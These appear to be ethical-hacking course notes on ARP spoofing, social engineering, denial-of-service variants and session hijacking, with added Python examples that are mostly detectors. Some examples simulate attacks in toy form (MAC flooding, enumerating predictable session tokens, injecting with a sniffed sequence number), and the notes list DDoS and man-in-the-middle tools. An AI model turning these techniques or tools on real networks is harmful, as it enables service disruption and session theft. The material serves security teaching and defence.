The ARP protocol is simple and efficient, but one drawback is its lack of authentication; as a result, there is no way to verify an IP-to-MAC address mapping, and a forged reply can redirect traffic. Uses include:
• Denial of service
• Man-in-the-middle/sniffing
• MAC flooding

MAC Spoofing
MAC spoofing is a simple concept in which an attacker (or pen tester) changes their MAC address to the MAC address of an existing authenticated machine already on the network.
• Fakes the MAC address of an existing client
• Allows a system to impersonate another
• Can allow for the bypass of any mechanism that uses a MAC address to control traffic

SMAC
(MAC address changing tool for Windows)

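The two switch attacks above in concrete form, as an added example that is not part of the course notes: constructed Ethernet/ARP frames (no real capture; the MAC and IP addresses are made up) are fed to a small arpwatch-style monitor that flags an IP whose MAC suddenly changes, or whose ARP sender field disagrees with the Ethernet source, and a toy CAM table shows why MAC flooding works: once the table is full a switch cannot learn new addresses and floods unknown destinations to every port.

```python
import struct

ETH = struct.Struct("!6s6sH")           # dst MAC, src MAC, EtherType
ARP = struct.Struct("!HHBBH6s4s6s4s")   # htype, ptype, hlen, plen, op, sha, spa, tha, tpa
ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_bytes(s: str) -> bytes:
    return bytes.fromhex(s.replace(":", ""))


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def ip_bytes(s: str) -> bytes:
    return bytes(int(o) for o in s.split("."))


def ip_str(b: bytes) -> str:
    return ".".join(str(x) for x in b)


def build_arp(op: int, sender_mac: str, sender_ip: str, target_mac: str, target_ip: str,
              eth_src: str = None) -> bytes:
    """An ARP frame. Nothing in it is authenticated: the sender fields are whatever the sender writes."""
    eth_dst = BROADCAST if op == ARP_REQUEST else target_mac
    eth = ETH.pack(mac_bytes(eth_dst), mac_bytes(eth_src or sender_mac), ETHERTYPE_ARP)
    return eth + ARP.pack(1, 0x0800, 6, 4, op, mac_bytes(sender_mac), ip_bytes(sender_ip),
                          mac_bytes(target_mac), ip_bytes(target_ip))


def parse_arp(frame: bytes):
    _, eth_src, etype = ETH.unpack_from(frame)
    if etype != ETHERTYPE_ARP:
        return None
    _, _, _, _, op, sha, spa, _, tpa = ARP.unpack_from(frame, ETH.size)
    return {"op": op, "eth_src": mac_str(eth_src), "sender_mac": mac_str(sha),
            "sender_ip": ip_str(spa), "target_ip": ip_str(tpa)}


class ArpWatch:
    """Track IP -> MAC bindings seen on the wire and raise an alert when one changes."""

    def __init__(self):
        self.bindings = {}
        self.alerts = []

    def observe(self, frame: bytes):
        a = parse_arp(frame)
        if a is None:
            return
        if a["eth_src"] != a["sender_mac"]:
            self.alerts.append(f"frame from {a['eth_src']} claims ARP sender {a['sender_mac']}")
        known = self.bindings.get(a["sender_ip"])
        if known and known != a["sender_mac"]:
            self.alerts.append(f"{a['sender_ip']} moved from {known} to {a['sender_mac']}")
        self.bindings[a["sender_ip"]] = a["sender_mac"]


class CamTable:
    """A switch's MAC -> port table with fixed capacity. Real switches also age entries out,
    which is why a flood has to be sustained to keep legitimate hosts from being relearned."""

    def __init__(self, capacity: int):
        self.capacity = capacity
        self.entries = {}

    def learn(self, src_mac: str, port: int) -> bool:
        if src_mac in self.entries or len(self.entries) < self.capacity:
            self.entries[src_mac] = port
            return True
        return False                      # table full: address not learned

    def forward(self, dst_mac: str):
        """Known destination -> one port; unknown -> flooded to all ports, hub style."""
        return self.entries.get(dst_mac, "flood")


def mac_flood(cam: CamTable, attacker_port: int, count: int) -> int:
    """What a flooding tool does: frames from `count` different source MACs on one port."""
    learned = 0
    for i in range(count):
        fake = f"02:de:ad:{(i >> 16) & 0xff:02x}:{(i >> 8) & 0xff:02x}:{i & 0xff:02x}"
        learned += cam.learn(fake, attacker_port)
    return learned
```

Both detections in `ArpWatch` are what Dynamic ARP Inspection does in hardware against a trusted binding source (DHCP snooping); the CAM model shows why port security that caps the number of MAC addresses per port stops the flood before the table fills.
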
Sniffing Countermeasures
• Use a switched network, with port security, for the most sensitive portions of your network.
• Enable DHCP snooping and Dynamic ARP Inspection on switches to prevent ARP poisoning and spoofing attacks.
• Implement policies preventing promiscuous mode on network adapters.
• Be careful when deploying wireless access points, knowing that all traffic on the wireless network is subject to sniffing.
• Encrypt your sensitive traffic using an encrypting protocol such as SSH, TLS, or IPsec.

Summary
• Sniffing allows the interception of network traffic.
• Sniffing targets vulnerable or insecure network protocols.
• Sniffing uses packet sniffers to gather traffic.
• Sniffing comes in active and passive modes.
• Sniffing can be impacted by hubs and switches.

10: Social Engineering

How Do Social Engineers Work?
They exploit the human element through:
• Threats
• Ignorance
• Trust
• Scarcity
• Moral obligation
• Urgency

Why Social Engineering Works
Social engineering is effective for a number of reasons,
each of which can be remedied or exploited depending on
whether you are the defender or the attacker.
• Lack of a technological fix
• Insufficient security policies
• Difficult detection
• Lack of training

Example of Social Engineering
• An unexpected phone call from your Internet service provider (ISP) or Microsoft
• Tells you you're either in danger (a virus or outdated software) or missing something valuable
• Why it works:
  • Exploits trust
  • Exploits buzzwords
  • Exploits scarcity

Example of Social Engineering
In the next phase, the attacker gains the user's trust, convinces the user a technical service is being provided, and requires payment via credit card.
• Exploits lack of technical know-how
• Interacts with the victim to build trust
• Acts as if providing a legitimate service
• Uses the charade to obtain financial information

Example of Social Engineering
• Exploits fear
• Leverages the target's ignorance
• Presents an image of authority
• Stresses urgency to force a reaction

Signs of an Attack
• Use (or abuse) of authority
• Inability to provide contact information
• Making informal requests
• Excessive name dropping
• Excessive use of praise
• Discomfort when questioned

Social Engineering Phases
Social engineering, like the other attacks we have explored, consists of multiple phases, each designed to move the attacker one step closer to the ultimate goal.
• Use recon to gain details about a target.
• Select a specific individual or group who may have what you need to get closer to the desired target.
• Forge a relationship with the intended victim through interaction.
• Exploit the relationship with the victim.

Impact of Social Engineering
After experiencing a successful social engineering attack, businesses say they suffer from business disruption, lost productivity, and lost revenue, and need to undo damage or conduct a forensic analysis.
• Economic loss
• Terrorism
• Loss of privacy
• Lawsuits and arbitrations
• Temporary or permanent closure

Targets of Social Engineering
An attacker will look for targets of opportunity or
potential victims who have the most to offer.
• Receptionists
• Help desk personnel
• System administrators
• Executives
• Users

Dangers of Social Networking
• Personal information
• Photos
• Location information
• Friend information
• Business information
• Likes and dislikes

Information Found on Social Networking
Social networking has made the attacker's job easier because of the volume of data and personal information available.
• Location information
• Personal data
• Company information
• Photos of private or secure facilities
• Information on co-workers
• Event or vacation information

Countermeasures Against Social Engineering
• Avoid mixing personal and professional information.
• Always verify contacts, and don't connect to just anyone online.
• Avoid reusing passwords.
• Don't post just anything online.
• Avoid posting personal information.

Countermeasures and Recommendations
To avoid problems with social networking, a company should exercise many different countermeasures:
• Educate employees against publishing any identifying personal information online.
• Encourage the use of non-work accounts for social media.
• Educate employees on the use of strong passwords.
• Avoid the use of public profiles that anyone can view.
• Remind users that once something is put online, it never goes away.
• Educate employees on the use of privacy settings.
• Instruct employees on the presence of phishing scams.

Internet-Based Social Networking
Many threats will continue to pose problems for those using the Internet, and unless you opt to stop using this resource, you must address the threats.
• Malware is used as an all-inclusive term for viruses, spyware, keyloggers, and worms.
• Shoulder surfing is when one party is able to look over another's shoulder, also called spying.
• Eavesdropping involves listening in on communications.
• Dumpster diving seeks to collect information from disposal points.
• Phishing uses a bogus email to bait you into clicking a link or visiting a malicious website.

Internet Social Engineering Countermeasures
• Exercise caution on unsecured wireless networks.
• Be careful accessing sensitive information in a public place.
• Don't save personal information casually on shopping websites.
• Be careful about posting personal information.
• Keep your computer personal.

Signs of Identity Theft
One of the most prominent and rapidly evolving threats is identity theft, which falls under the heading of social engineering.
• You see withdrawals that are unexplained.
• You don't get your bills or other mail.
• Merchants refuse your checks.
• Debt collectors call you about debts that aren't yours.
• You find unfamiliar accounts or charges on your credit report.
• Medical providers bill you for services you didn't use.
• You get notice that your information was compromised by a data breach.

Protection Against Identity Theft
Identity Theft Countermeasures
• Examine requests for personal information.
• Be careful of applications that require registration.
• Avoid using standard security questions.
• Formulate your own questions where possible.
In many cases, the only thing standing between someone and your money is a four- to six-digit number or a word or combination of words.
219
Finding Out About Yourself
Social Networking Search Engines
• Spokeo
• Intelius
• ZabaSearch
• Facebook
• People Search
• LinkedIn
• Shodan (a search engine for Internet-connected devices rather than people; useful for finding what you expose, not who you are)
220
Summary
•What social engineering is
•How social engineering works
•Countermeasures

221
11: Denial of
Service

222
Goals of Denial-of-Service Attacks

Goal is to deny or disrupt use of resources

Unavailability of a resource

Loss of access to a website

Slow performance

Increase in spam emails


223
Case Study: WikiLeaks
• After Julian Assange’s WikiLeaks
release of government information,
many financial institutions stopped
serving WikiLeaks.
• Hackers targeted these institutions'
websites with DoS attacks, making
them unavailable to customers.
• The companies ultimately hardened
their sites, but hackers had shown they
could disrupt major targets.

224
Denial-of-Service Goals and Motivations
• Web server compromise
• Back-end resources
• Network or computer specific
• Extortion via a threat of a DoS attack
• Turf wars and fights between online gangs
• Anticompetition business practices
• Punishment for undesired actions
• Expression of anger and criticism
• Training for other attacks
• Self-induced
• No reason at all
225
Types of Attacks
A successful DoS attack is a highly noticeable event, which makes it a popular weapon of choice for hacktivists, cyber vandals, extortionists, and those looking to make a point.
• Type #1: Volumetric attacks
  • 65% of attacks
  • Eats resources (bandwidth and packet-processing capacity)
  • Hard to mitigate
• Type #2: Application-layer attacks
  • 17% of DDoS attacks
  • HTTP flood is a form
226
Forms of Denial of Service
Service request floods
SYN attack/flood
ICMP flood attack
Ping of death
Teardrop
Smurf and/or fraggle
Land
227
SYN Floods at Work
The basic idea behind SYN flooding utilizes the three-way handshake that begins with a user sending a "synchronize" (SYN) message to the server.
• Attacker floods the server with SYN packets carrying spoofed source addresses.
• Server responds with a SYN/ACK reply to each fake source address.
• No ACK reply ever arrives, so the server must wait until each half-open connection times out.
• The backlog of half-open connections prevents legitimate users from accessing the server.
228
SYN Flood Countermeasures
• Use firewalls in order to filter packets (a SYN proxy on the firewall completes the handshake on the server's behalf and forwards only connections that actually finish it).
• Modify the size of the server's half-open connection queue to a larger size.
• Decrease the queue's timeout period.
• Limit the number of half-open connections from a single IP (of limited value when the source addresses are spoofed at random).
• Modern kernels additionally use SYN cookies, which encode the connection state in the SYN/ACK sequence number so that no backlog entry is held until the final ACK arrives.
229
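The two slides above describe the flood and its countermeasures in words; the following is an added example (not part of the course notes) of the detection side: a half-open connection tracker that consumes SYN / SYN-ACK / ACK events and reports when a server's backlog or a single source exceeds a limit. The event format, the sample trace, the thresholds and the timeout are all constructed for this illustration; a real tool would take the events from a packet capture.

```python
# Added example (not from the course notes): a half-open connection tracker
# that reads constructed TCP flag events and flags a SYN flood. Assumptions:
# the event format, the thresholds and the timeout are all illustrative.
import collections

# Constructed trace: (time_s, src_ip, dst_ip, flags). 10.0.0.5 completes a
# normal handshake; then 300 SYNs from 250 spoofed sources never finish theirs.
SAMPLE_EVENTS = [
    (0.0, "10.0.0.5", "192.0.2.10", "S"),
    (0.1, "192.0.2.10", "10.0.0.5", "SA"),
    (0.2, "10.0.0.5", "192.0.2.10", "A"),
] + [(1.0 + i * 0.01, f"198.51.100.{i % 250 + 1}", "192.0.2.10", "S") for i in range(300)]


class HalfOpenTracker:
    """Tracks embryonic (SYN seen, no ACK yet) connections per server."""

    def __init__(self, timeout=30.0, max_half_open=100, max_per_src=10):
        self.timeout = timeout              # like the kernel's SYN-RECV timeout
        self.max_half_open = max_half_open  # backlog size being defended
        self.max_per_src = max_per_src      # per-source limit countermeasure
        self.half_open = {}                 # (client, server) -> time of SYN

    def expire(self, now):
        """Countermeasure: a shorter timeout frees backlog entries sooner."""
        stale = [k for k, t in self.half_open.items() if now - t > self.timeout]
        for k in stale:
            del self.half_open[k]

    def feed(self, t, src, dst, flags):
        self.expire(t)
        if flags == "S":                              # client -> server SYN
            self.half_open[(src, dst)] = t
        elif flags == "A" and (src, dst) in self.half_open:
            del self.half_open[(src, dst)]            # handshake completed
        # the server's SYN/ACK does not change the half-open state

    def per_server(self):
        return dict(collections.Counter(dst for (_, dst) in self.half_open))

    def per_source(self):
        return dict(collections.Counter(src for (src, _) in self.half_open))

    def alerts(self):
        """Servers over the backlog limit, and sources holding more half-open
        connections than any real client needs."""
        out = []
        for server, n in self.per_server().items():
            if n > self.max_half_open:
                out.append(f"SYN flood suspected against {server}: {n} half-open")
        for src, n in self.per_source().items():
            if n > self.max_per_src:
                out.append(f"source {src} holds {n} half-open connections")
        return out


def analyse(events, **kw):
    tracker = HalfOpenTracker(**kw)
    for ev in events:
        tracker.feed(*ev)
    return tracker


if __name__ == "__main__":
    tr = analyse(SAMPLE_EVENTS)
    print(tr.per_server())
    for a in tr.alerts():
        print(a)
```

Note that the per-source limit never fires on this trace: every spoofed source holds only one entry, which is exactly why that countermeasure is weak against randomly spoofed floods, while a shorter timeout (try `analyse(SAMPLE_EVENTS, timeout=0.205)`) drains the backlog quickly.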
Smurf Attack
[Figure: Attacker -> Amplifier -> Victim. Labels: "A misconfigured router forwarding the broadcast request to the subnet"; "Machines that will respond to this ICMP broadcast request".]
Note that there is not much a victim can do about this attack since the link is simply overloaded with packets.
230
Anatomy of a Smurf Attack

231
Steps Leading to a Smurf Attack
• Huge numbers of ICMP echo requests are sent to the broadcast address of an intermediary (amplifier) network.
• The source IP address of each request is spoofed to the victim's address.
• Every host on the amplifier network responds to the echo request, and all of those replies go to the victim.
• This creates a significant amount of traffic on the victim's network, resulting in consumption of bandwidth and ultimately causing the victim's server to crash or become unreachable.

232
Countermeasures for Smurf Attacks
• The router should be configured so that it does not forward directed broadcasts onto networks.
• Servers should be configured to not respond to a directed broadcast request.
• The victim's ISP must take some actions to block ICMP Echo Reply floods.
233
Fraggle Attack
• Floods a target with UDP packets
• Targets packets toward a victim
• Uses an intermediate network to amplify the attack
• Much like a smurf attack but based on UDP (typically the echo service on port 7 or chargen on port 19, both of which answer any datagram)

Note that a fraggle attack is a variation of a smurf attack where an attacker sends a large amount of UDP traffic to an IP broadcast address, with the intended victim's spoofed source IP address.

234
Ping of Death
• Uses IP packet fragmentation techniques to crash remote systems
• Transmits ICMP packets whose reassembled size exceeds the 65,535-byte IP maximum to the victim host
• The IP packet is fragmented into Ethernet-sized frames for transmission
• When the fragments are reassembled, the oversized result overflows the reassembly buffer and causes a crash or lock-up
• Modern systems typically not vulnerable

235
Teardrop Attacks
In the teardrop attack, the attacker puts a confusing (overlapping) offset value in the second or later fragment. If the receiving operating system does not have a plan for this situation, it can cause the system to crash.
• Exploits the fragmentation process
• Specifies illogical offsets
• Receiving system will reassemble the packet
• Illogical offsets can cause a system crash
• Older systems tend to be targets
• Newer systems usually do not have this problem

236
Land Attack
• Looks similar to a SYN flood
• Sometimes referred to as an "infinite loop" attack
• Crashes a system by sending it a forged packet
• Packet has its source and destination (IP address and port) set to the victim's own
• Makes the system think it is sending itself a message
• Can crash or slow a system
• Newer systems not vulnerable

237
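Ping of death, teardrop and land are all malformed-packet attacks, and each can be caught by a sanity check that old IP stacks failed to make. The following is an added example (not from the course notes) that runs those checks over constructed packet descriptions; the record layout, the sample fragments and the function names are assumptions made for this illustration, not the behaviour of any particular stack.

```python
# Added example (not part of the course notes): sanity checks that catch the
# three malformed-packet attacks described above (ping of death, teardrop and
# land) on a constructed packet description. The record layout and the
# helper names are assumptions made for this illustration.
MAX_IP_PACKET = 65535   # largest datagram the 16-bit IP total-length field allows

# Constructed datagrams: each fragment is (offset_bytes, payload_len, more_fragments)
SAMPLE = {
    "normal":        [(0, 1480, True), (1480, 520, False)],
    "teardrop":      [(0, 36, True), (24, 4, False)],       # second fragment inside the first
    "ping_of_death": [(0, 1480, True), (65528, 20, False)], # ends at 65548 > 65535
}
LAND_PKT = {"src": "192.0.2.10", "dst": "192.0.2.10", "sport": 139, "dport": 139}


def check_land(pkt):
    """Land: source and destination address and port are identical."""
    return pkt["src"] == pkt["dst"] and pkt.get("sport") == pkt.get("dport")


def check_fragments(frags):
    """Reassembly sanity checks for one datagram's fragments.
    Returns a list of problems; an empty list means the datagram is sane."""
    problems = []
    frags = sorted(frags, key=lambda f: f[0])
    end_of_previous = 0
    for offset, length, more in frags:
        if offset % 8:                      # offsets are carried in 8-byte units
            problems.append(f"offset {offset} is not a multiple of 8")
        if offset < end_of_previous:        # teardrop: overlaps its predecessor
            problems.append(f"fragment at {offset} overlaps data ending at {end_of_previous}")
        end_of_previous = max(end_of_previous, offset + length)
        if offset + length > MAX_IP_PACKET:  # ping of death: reassembled size too large
            problems.append(f"fragment ends at {offset + length}, beyond {MAX_IP_PACKET}")
    if frags and frags[-1][2]:
        problems.append("last fragment still has MF set (incomplete datagram)")
    return problems


if __name__ == "__main__":
    for name, frags in SAMPLE.items():
        print(name, check_fragments(frags) or "ok")
    print("land", check_land(LAND_PKT))
```

A reassembly engine that keeps the `end_of_previous` bookkeeping above never computes a negative fragment length, which was the actual bug teardrop exploited.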
Permanent Denial of Service
By exploiting security flaws or misconfigurations, permanent denial of service (PDoS) can destroy the firmware and/or basic functions of a system.
• Also known as phlashing, which is a form of PDoS
• Environments at particular risk:
  • Highly virtualized environments
  • Organizations highly dependent on IoT
  • Organizations with centralized security gateways
  • Organizations that are considered critical infrastructure
238
A Word About Buffer Overflows
A buffer overflow occurs when a program or process tries to store more data in a buffer (temporary data storage area) than it was intended to hold.
• Occurs when a program attempts to store data in memory beyond the buffer's bounds
• Can occur because of programming errors
• Can be uncovered in any software
• Usually patched when discovered

239
DDoS Attacks
A standard DoS attack can be launched from a single malicious client, whereas a DDoS attack uses a distributed group of computers to attack a single target.
• Attacker compromises multiple hosts
• Hosts are used to execute the attack
• DoS is a one-on-one, smaller-scale attack
• Compromised systems are bots or zombies
• Bots are commonly created with Trojans
• Result is loss of access to a given resource
240
Defending Against DoS
Disabling unnecessary services
Using anti-malware
Enabling router throttling
Using a reverse proxy
Enabling ingress and egress filtering
Degrading services
Absorbing the attack
241
DDoS and DoS Tools
LOIC, HOIC
XOIC
HULK
UDP Flooder
RUDY
Tor's Hammer
PyLoris
OWASP Switchblade
DAVOSET
GoldenEye HTTP DoS Tool
THC-SSL-DOS
DDOSIM: Layer 7 DDoS Simulator

242
Summary
• Denial-of-service attacks
• How denial-of-service attacks work

243
12: Session
Hijacking

244
What Is Session Hijacking?
Session hijacking (called TCP session hijacking when performed at the network level) is a method of taking over a user's session by surreptitiously obtaining the session identifier, whether a web session ID or the TCP sequence numbers, and masquerading as the authorized user.
• Session hijacking is roughly a stolen session.
• A session represents a connection.
• Session hijacking incorporates the same concepts as sniffing.
• It can be used to take over authenticated sessions.
245
Understanding Session Hijacking
No account lockout for invalid session IDs
Insecure handling
Weak session ID generation algorithm
Indefinite session expiration time
Cleartext transmission
Small session IDs

246
Spoofing vs. Hijacking
Spoofing occurs when an attacking party impersonates an identity.
In hijacking, the attacker takes over an existing active session.
Sniffing

Monitoring

Session desynchronization

Session ID prediction

Command injection
247
Types of Session Hijacking
Active
• An attacker hijacks a session
• Injects commands into the session
Passive
• An attacker hijacks a session
• Monitors and records traffic
248
TCP and the Three-Way Handshake
TCP establishes connections with the three-way handshake and then uses sequence numbers to verify that each packet reaches its destination and is reassembled in the right order.
• Ports can be TCP or UDP.
• TCP is a connection-oriented protocol.
• The three-way handshake is used to establish a connection.
• The three-way handshake must complete before data packets are sent.
• The three-way handshake does not handle security: nothing in it authenticates either party.
• TCP also provides sequence numbers for reassembly of data.
249
TCP Flags
SYN: Used to initiate a connection between two different hosts in order to facilitate communications.
ACK: Used to acknowledge the receipt of a packet of information.
URG: States that the data pointed to by the urgent pointer should be processed immediately.
PSH: Instructs the receiving system to pass buffered data up to the application immediately rather than waiting for more.
FIN: Tells the remote system that no more information will be sent. In essence this is gracefully closing a connection.
RST: A reset packet that is used to abort (reset) a connection.

250
TCP Sequence Numbers
• Sequence number describes the order of bytes in the stream, and therefore of packets
• Advanced by the number of data bytes in each transmitted segment (SYN and FIN each count as one byte)
• Starts from an initial sequence number (ISN), which should be unpredictable
• 32-bit number

251
Session Hijacking and Web Applications
Session hijacking at the application level focuses on gaining access to a host by obtaining legitimate session IDs from the victim.
Where session IDs are carried:
• Embedded as a hidden field
• Embedded in a URL
• Cookies

252
Application-Level Hijacking
• Predicting session tokens, e.g.:
  • /app/spo22022005131020
  • /app/spo22022005141520
  • /app/spo22022005171126
  • /app/spo22022005213111
• Session sniffing
• Man-in-the-browser attack
  • Browser helper objects
  • Extensions
  • API hooking
  • JavaScript
• Man-in-the-middle attack
253
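The four tokens listed above share a fixed prefix followed by what reads as a date (22-02-2005) and a time of day, so an attacker who knows roughly when a victim logged in has only a few thousand candidates to try. The following is an added example (not from the course notes) that parses the tokens, sizes the guess space, enumerates the candidates for a login window, and shows what a properly generated session ID looks like. The DDMMYYYY + HHMMSS layout is inferred from the samples on the slide; the function names and the use of `secrets.token_urlsafe` are my choices, not the original author's.

```python
# Added example (not from the course notes): why tokens like the ones listed
# above are predictable, and what a properly generated session ID looks like.
# The token layout ("spo" + DDMMYYYY + HHMMSS) is inferred from the samples on
# the slide; the sequencing assumptions are mine, not the original author's.
import math
import re
import secrets
from datetime import datetime

SAMPLE_TOKENS = [   # taken from the slide above
    "spo22022005131020", "spo22022005141520",
    "spo22022005171126", "spo22022005213111",
]
TOKEN_RE = re.compile(r"^(?P<prefix>[a-z]+)(?P<date>\d{8})(?P<time>\d{6})$")


def parse_token(token):
    """Split a token into its fixed prefix and a timestamp; None if no match."""
    m = TOKEN_RE.match(token)
    if not m:
        return None
    stamp = datetime.strptime(m["date"] + m["time"], "%d%m%Y%H%M%S")
    return {"prefix": m["prefix"], "timestamp": stamp}


def guess_space_bits(tokens):
    """Bits an attacker must guess once the prefix and date are known and only
    the time of day varies: log2(86400), about 16.4 bits, and far less once the
    attacker knows roughly when the victim logged in."""
    parsed = [parse_token(t) for t in tokens]
    if any(p is None for p in parsed):
        return None
    prefixes = {p["prefix"] for p in parsed}
    dates = {p["timestamp"].date() for p in parsed}
    if len(prefixes) == 1 and len(dates) == 1:
        return math.log2(24 * 60 * 60)
    return math.log2(24 * 60 * 60 * 366 * len(prefixes))   # rough upper bound


def candidate_tokens(prefix, day_ddmmyyyy, start_sec, end_sec):
    """Every token an attacker would try for a login window given as seconds
    since midnight; shows how small the search really is."""
    return [f"{prefix}{day_ddmmyyyy}{s // 3600:02d}{s % 3600 // 60:02d}{s % 60:02d}"
            for s in range(start_sec, end_sec)]


def new_session_id(nbytes=32):
    """Secure alternative: 256 random bits from the OS CSPRNG, URL-safe encoded."""
    return secrets.token_urlsafe(nbytes)


def secure_bits(nbytes=32):
    return nbytes * 8


if __name__ == "__main__":
    print(parse_token(SAMPLE_TOKENS[0]))
    print(round(guess_space_bits(SAMPLE_TOKENS), 1), "bits to guess")
    print(len(candidate_tokens("spo", "22022005", 13 * 3600, 14 * 3600)), "candidates for one hour")
    print(new_session_id(), secure_bits(), "bits")
```

Sixteen bits against a server that does not rate-limit is minutes of work; 256 bits from a CSPRNG is the usual target for a session ID, and the ID should additionally be bound to TLS and rotated at login.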
Cross-Site Scripting
Cross-site scripting (XSS) is a type of attack that can occur in many forms, but in general it occurs when data of some type enters a web application through an untrusted source.
Stored attacks
• The attacker stores malicious code in the vulnerable page.
• The user authenticates in the application.
• The user visits a vulnerable page.
• Malicious code is executed by the user's browser.
Reflected attacks
• It is delivered in the form of an email link or via a different web server.
• It occurs when a party injects executable code within an HTTP response.
• The code is not persistent and is not stored.
• It leverages JavaScript, VBScript, or other scripting languages where appropriate.
254
Session Fixation
The attacker chooses the session ID in advance and tricks the victim into authenticating with it; once the victim logs in, the attacker already holds a valid authenticated session. Ways to plant the ID:
• A session ID is sent to the victim in a malicious hyperlink for the victim to click.
• The victim is tricked into authenticating to the target using an attacker-created login form.
• The attacker uses script injection (for example XSS) to set the session cookie in the victim's browser.
• A Set-Cookie response header from a server the attacker controls fixes the session ID in the victim's browser.
Defense: issue a fresh session ID on every login and never accept a client-supplied ID the server did not generate.

255
Key Concepts
Blind hijacking

IP spoofing

Source routing

DNS spoofing

ARP cache poisoning

256
Network Session Hijacking
• Blind hijacking
• IP spoofing
• Source routing
• DNS spoofing
• ARP cache poisoning
• Desynchronizing the connection

257
TCP Session Hijacking
• Sniff the traffic between the victim machines.
• Predict the sequence numbers of the packets traversing the network.
• Perform a DoS on the victim's machine, or reset their connection.
• Start injecting packets into the server, imitating the authenticated client.
259
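The four steps above, together with the handshake and sequence-number slides earlier in this chapter, are easier to see in a toy model. The following is an added example (not from the course notes) of a minimal receiver that accepts a segment only when its sequence number is the next one expected, which is all a plain TCP stack checks; it shows a sniffed sequence number being used to inject data (and the real client being desynchronized as a result), and why a constant-increment ISN allowed blind prediction. The endpoint model and the `blind_isn_guess` increment are simplifications made for this illustration, not a real TCP implementation.

```python
# Added example (not from the course notes): a toy model of TCP sequence
# tracking that shows why a sniffed (or predicted) sequence number lets an
# attacker inject data into an established session. The endpoint model is a
# simplification made for this illustration; it is not a real TCP stack.
import secrets


class Endpoint:
    """Minimal receiver: accepts a segment only if its sequence number is the
    next byte it expects, which is all TCP checks before handing data up."""

    def __init__(self, isn):
        self.snd_nxt = isn            # next sequence number we will send
        self.rcv_nxt = None           # next sequence number we expect
        self.received = b""

    def accept(self, seq, payload):
        if seq != self.rcv_nxt:       # out of order or forged: dropped
            return False
        self.received += payload
        self.rcv_nxt += len(payload)
        return True


def handshake(client, server):
    """Three-way handshake: SYN, SYN/ACK, ACK. A SYN consumes one sequence number."""
    server.rcv_nxt = client.snd_nxt + 1   # server learns the client's ISN
    client.rcv_nxt = server.snd_nxt + 1   # client learns the server's ISN
    client.snd_nxt += 1
    server.snd_nxt += 1


def legitimate_send(sender, receiver, payload):
    ok = receiver.accept(sender.snd_nxt, payload)
    sender.snd_nxt += len(payload)
    return ok


def hijack_with_sniffed_seq(server, sniffed_seq, payload):
    """Attacker who sniffed the client's current sequence number (steps 1-2 on
    the slide) injects a segment that the server accepts as the client's."""
    return server.accept(sniffed_seq, payload)


def blind_isn_guess(previous_isn, increment=64000):
    """Old stacks advanced the ISN by a constant per connection, so a blind
    attacker who opened one connection could predict the next victim's ISN.
    The increment is illustrative."""
    return (previous_isn + increment) & 0xFFFFFFFF


def random_isn():
    """Modern stacks choose an unpredictable ISN (RFC 6528 style), which
    defeats blind prediction; the attacker is then forced to sniff."""
    return secrets.randbits(32)


def demo():
    client, server = Endpoint(isn=1000), Endpoint(isn=5000)
    handshake(client, server)
    legitimate_send(client, server, b"GET /account HTTP/1.1\r\n")
    # The attacker sniffed client.snd_nxt on the wire; after a DoS on the
    # client (step 3) the injected segment arrives before the real client's.
    injected = hijack_with_sniffed_seq(server, client.snd_nxt, b"DELETE /account\r\n")
    # The real client is now out of sync: its next segment is rejected.
    desynced = legitimate_send(client, server, b"GET /logout HTTP/1.1\r\n")
    return injected, desynced, server.received


if __name__ == "__main__":
    print(demo())
    print(blind_isn_guess(1000), random_isn())
```

The desynchronization in `demo()` is the ACK storm scenario: the client keeps retransmitting from its own idea of `snd_nxt`, the server keeps rejecting, and a network IDS can spot the burst of duplicate ACKs even when it cannot see the injected payload.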
Man-in-the-Middle (MitM)
Once attackers are in the middle of the connection via a technique such as ARP poisoning, they can monitor or manipulate traffic.
Network level
• PacketCreator
• Ettercap
• Dsniff
• Cain & Abel
Application level
• OWASP WebScarab
• Paros Proxy
• Burp Suite
• ProxyFuzz
• Odysseus Proxy
• Fiddler
260
Defensive Countermeasures
Encryption is effective against hijacking.

Use an IDS to detect network anomalies.

Check and filter for spoofed information.

Be aware of web browser vulnerabilities.

Implement stronger authentication systems.

Use technologies such as IPsec and SSL/TLS.

261
Summary
•What is TCP or session hijacking?
•How is session hijacking performed?
•Different formats of session hijacking
•Active or passive session hijacks
•Results of a successful attack

262
13: Web Servers
and Applications

264
Client and Server
Roles:
• Server administrators
• Network administrators
• End users
• Application administrator
• Application developer
265
A Closer Look at Web Servers
• Web server delivers content over HTTP or other protocols.
• Files are delivered in response to requests.
• Web servers can support different types of content.
• Multiple web server platforms exist from different vendors.
• The top three popular web servers are Apache, Internet Information Services (IIS), and nginx.
266
Apache for Linux and UNIX
Security features
• Authentication
• SSL/TLS support
• Proxy support
• URL rewriter
• HTTP request filtering
• Intrusion detection
• Enhanced logging
Application support
• Python and Perl support
• PHP
• Compression support
267
Microsoft Internet Information Services (IIS)
Security features
• Certificate support
• Authentication support
• Security support and management
Application development
• Process management
• Server-side language
• Database support
• Protocol listeners
Compatibility
• Support for legacy technologies

268
Web Applications
A web application is software that is installed on top of a web server and is designed to respond to requests, process information, and store information.
Types:
• Browser based
• Mobile apps
• Client based
269
Client and Server Web Applications
A server application is hosted on a web server and is designed to be accessed remotely via a web browser or web-enabled application.
• The server application is on the web server.
• The client is a web browser or web-enabled application.
• Information is stored on the server.
• Processing is done on the server.
• The end result is delivered to the user.
• Applications can be made for one platform.
270
Cloud Services
The cloud is a model for creating shared resources that can be dynamically allocated and shared on demand.
• Infrastructure as a Service (IaaS)
• Platform as a Service (PaaS)
• Software as a Service (SaaS)

271
A Closer Look at Web Applications
• Presentation layer
• Logic layer
• Data layer
All of these layers depend on the technology brought to the table in the form of the World Wide Web, HTML, and HTTP.

272
What Is a Cookie?
Cookies are used to store data.

The file holds state information.

Information can be exposed to a hacker.

Insecure cookies could allow theft.

It’s a commonly used technique.


273
Pieces of the Web Application Puzzle
• Web server
• Authentication process (login, permissions, logout)
• Application content
• Session tracking
• Data access
• Data store
• Logic

274
Common Problems with Web Applications
• Flawed Web Design
• Too much revealed in code
• Presence of server information
• Presence of connection information
• Buffer Overflow
• Software-based issue
• Common vulnerability
• Can cause numerous issues

275
Other Attacks Against Web Applications
• Denial-of-service attack
• Distributed denial-of-service attack
• Ping or ICMP flooding attack
• Smurf attack
• SYN flooding
• Fragmentation attack

276
